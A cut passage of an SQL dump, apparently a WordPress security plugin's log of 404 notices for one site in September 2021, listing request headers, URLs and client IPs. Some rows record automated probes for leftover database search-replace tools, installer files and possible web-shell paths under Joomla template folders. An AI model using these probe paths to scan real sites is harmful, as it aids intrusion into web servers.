04:33:58',72320552,72402928,'https://zphiblgz.org/cache.php',1,0,'185.191.34.215'),(96884,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:45:\"https://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:102:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631247312.6299240589141845703125;s:12:\"REQUEST_TIME\";i:1631247312;}}','notice','2021-09-10 04:15:15','2021-09-10 04:15:12',72629792,72712776,'https://zphiblgz.org/scholarship/application/',1,0,'185.220.100.247'),(96852,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:52.0) Gecko/20100101 Firefox/52.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631150581.2270500659942626953125;s:12:\"REQUEST_TIME\";i:1631150581;}}','notice','2021-09-09 01:23:03','2021-09-09 01:23:01',72612904,72700272,'https://zphiblgz.org/event/youth-open-house/',1,0,'34.78.13.12'),(96854,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:52.0) Gecko/20100101 Firefox/52.0\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631150633.195220947265625;s:12:\"REQUEST_TIME\";i:1631150633;}}','notice','2021-09-09 01:23:54','2021-09-09 01:23:53',72307592,72391456,'http://zphiblgz.org/magento_version',1,0,'34.78.13.12'),(96853,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:52.0) Gecko/20100101 Firefox/52.0\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631150586.1253259181976318359375;s:12:\"REQUEST_TIME\";i:1631150586;}}','notice','2021-09-09 01:23:07','2021-09-09 01:23:06',72307560,72391432,'http://zphiblgz.org/application',1,0,'34.78.13.12'),(96855,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:52.0) Gecko/20100101 Firefox/52.0\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631150633.205935001373291015625;s:12:\"REQUEST_TIME\";i:1631150633;}}','notice','2021-09-09 01:23:54','2021-09-09 01:23:53',72307512,72391384,'http://zphiblgz.org/install.php',1,0,'34.78.13.12'),(96856,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:103:\"Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631154809.9563019275665283203125;s:12:\"REQUEST_TIME\";i:1631154809;}}','notice','2021-09-09 02:33:32','2021-09-09 02:33:30',72704368,72788104,'http://zphiblgz.org/scholarship/application/',1,0,'154.13.1.179'),(96857,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:47:\"text/html,application/xhtml+xml,application/xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:68:\"Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631155657.6793100833892822265625;s:12:\"REQUEST_TIME\";i:1631155657;}}','notice','2021-09-09 02:47:39','2021-09-09 02:47:37',72599656,72683424,'http://zphiblgz.org/application',1,0,'18.214.40.161'),(96858,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"50\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631161687.1297619342803955078125;s:12:\"REQUEST_TIME\";i:1631161687;}}','notice','2021-09-09 04:28:09','2021-09-09 04:28:07',72684768,72785560,'https://zphiblgz.org/templates/protostar/html/pagination.php',1,0,'185.191.34.215'),(96859,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:124:\"Mozilla/5.0 (iPad; CPU OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B141 Safari/8536.25\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631162729.383038997650146484375;s:12:\"REQUEST_TIME\";i:1631162729;}}','notice','2021-09-09 04:45:30','2021-09-09 04:45:29',72306520,72390256,'http://zphiblgz.org/SearchReplace-master/',1,0,'31.42.185.24'),(96860,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:124:\"Mozilla/5.0 (iPad; CPU OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B141 Safari/8536.25\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631162734.71506404876708984375;s:12:\"REQUEST_TIME\";i:1631162734;}}','notice','2021-09-09 04:45:36','2021-09-09 04:45:34',72604768,72688624,'http://zphiblgz.org/Search-DB-master/',1,0,'31.42.185.24'),(96861,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:124:\"Mozilla/5.0 (iPad; CPU OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B141 Safari/8536.25\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631162741.6178019046783447265625;s:12:\"REQUEST_TIME\";i:1631162741;}}','notice','2021-09-09 04:45:43','2021-09-09 04:45:41',72604872,72688712,'http://zphiblgz.org/Search-DB-master-ohiu/',1,0,'31.42.185.24'),(96862,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:124:\"Mozilla/5.0 (iPad; CPU OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B141 Safari/8536.25\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631162747.8249690532684326171875;s:12:\"REQUEST_TIME\";i:1631162747;}}','notice','2021-09-09 04:45:49','2021-09-09 04:45:48',72604856,72688696,'http://zphiblgz.org/searchreplacebd2.php',1,0,'31.42.185.24'),(96863,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:124:\"Mozilla/5.0 (iPad; CPU OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B141 Safari/8536.25\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631162768.5809841156005859375;s:12:\"REQUEST_TIME\";i:1631162768;}}','notice','2021-09-09 04:46:10','2021-09-09 04:46:08',72604792,72688648,'http://zphiblgz.org/searchreplacebd.php',1,0,'103.26.142.68'),(96864,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:124:\"Mozilla/5.0 (iPad; CPU OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B141 Safari/8536.25\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631162775.3172359466552734375;s:12:\"REQUEST_TIME\";i:1631162775;}}','notice','2021-09-09 04:46:17','2021-09-09 04:46:15',72605024,72688800,'http://zphiblgz.org/searchreplacemaster.php',1,0,'91.219.236.228'),(96865,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:124:\"Mozilla/5.0 (iPad; CPU OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B141 Safari/8536.25\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631162782.6594240665435791015625;s:12:\"REQUEST_TIME\";i:1631162782;}}','notice','2021-09-09 04:46:24','2021-09-09 04:46:22',72603848,72687512,'http://zphiblgz.org/Search_Replace_DB_master/',1,0,'185.247.225.85'),(96866,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:124:\"Mozilla/5.0 (iPad; CPU OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B141 Safari/8536.25\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631162824.2627499103546142578125;s:12:\"REQUEST_TIME\";i:1631162824;}}','notice','2021-09-09 04:47:06','2021-09-09 04:47:04',72627936,72711696,'http://zphiblgz.org/replacedb2.php',1,0,'185.220.100.251'),(96867,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:124:\"Mozilla/5.0 (iPad; CPU OS 6_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B141 Safari/8536.25\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631162831.4211080074310302734375;s:12:\"REQUEST_TIME\";i:1631162831;}}','notice','2021-09-09 04:47:13','2021-09-09 04:47:11',72628976,72712824,'http://zphiblgz.org/SR-DB/',1,0,'199.195.253.53'),(96868,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631169063.6758201122283935546875;s:12:\"REQUEST_TIME\";i:1631169063;}}','notice','2021-09-09 06:31:05','2021-09-09 06:31:03',72603912,72687648,'http://zphiblgz.org/scholarship/application/',1,0,'195.19.29.84'),(96869,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"50\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631169568.70672893524169921875;s:12:\"REQUEST_TIME\";i:1631169568;}}','notice','2021-09-09 06:39:30','2021-09-09 06:39:28',72688776,72789568,'https://zphiblgz.org/templates/protostar/html/modules.php',1,0,'185.191.34.215'),(96870,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:11:\"HTTP_ACCEPT\";s:99:\"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.3\";s:19:\"HTTP_ACCEPT_CHARSET\";s:32:\"utf-8,windows-1251;q=0.7,*;q=0.6\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-us,en;q=0.6\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:14:\"max-age=259200\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:49.0) Gecko/20100101 Firefox/49.0\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631184275.275762081146240234375;s:12:\"REQUEST_TIME\";i:1631184275;}}','notice','2021-09-09 10:44:37','2021-09-09 10:44:35',72628472,72712216,'http://zphiblgz.org/contact/',1,0,'206.217.132.202'),(96871,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"50\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631190310.164968967437744140625;s:12:\"REQUEST_TIME\";i:1631190310;}}','notice','2021-09-09 12:25:12','2021-09-09 12:25:10',72706648,72807424,'https://zphiblgz.org/layouts/libraries/cms/html/bootstrap/addtab.php',1,0,'185.191.34.215'),(96872,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631203316.3453159332275390625;s:12:\"REQUEST_TIME\";i:1631203316;}}','notice','2021-09-09 16:01:58','2021-09-09 16:01:56',72603912,72687648,'http://zphiblgz.org/scholarship/application/',1,0,'45.87.2.128'),(96873,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631207920.194778919219970703125;s:12:\"REQUEST_TIME\";i:1631207920;}}','notice','2021-09-09 17:18:43','2021-09-09 17:18:40',72161712,72244904,'https://zphiblgz.org/event/7th-annual-denim-pearlz-rep-your-decade/',1,0,'207.46.13.65'),(96874,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:9:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631217660.1298429965972900390625;s:12:\"REQUEST_TIME\";i:1631217660;}}','notice','2021-09-09 20:01:02','2021-09-09 20:01:00',72627640,72711384,'http://zphiblgz.org/old/',1,0,'162.241.229.133'),(96875,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:120:\"Mozilla/5.0 (Windows NT 10.0; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.34 Safari/537.36 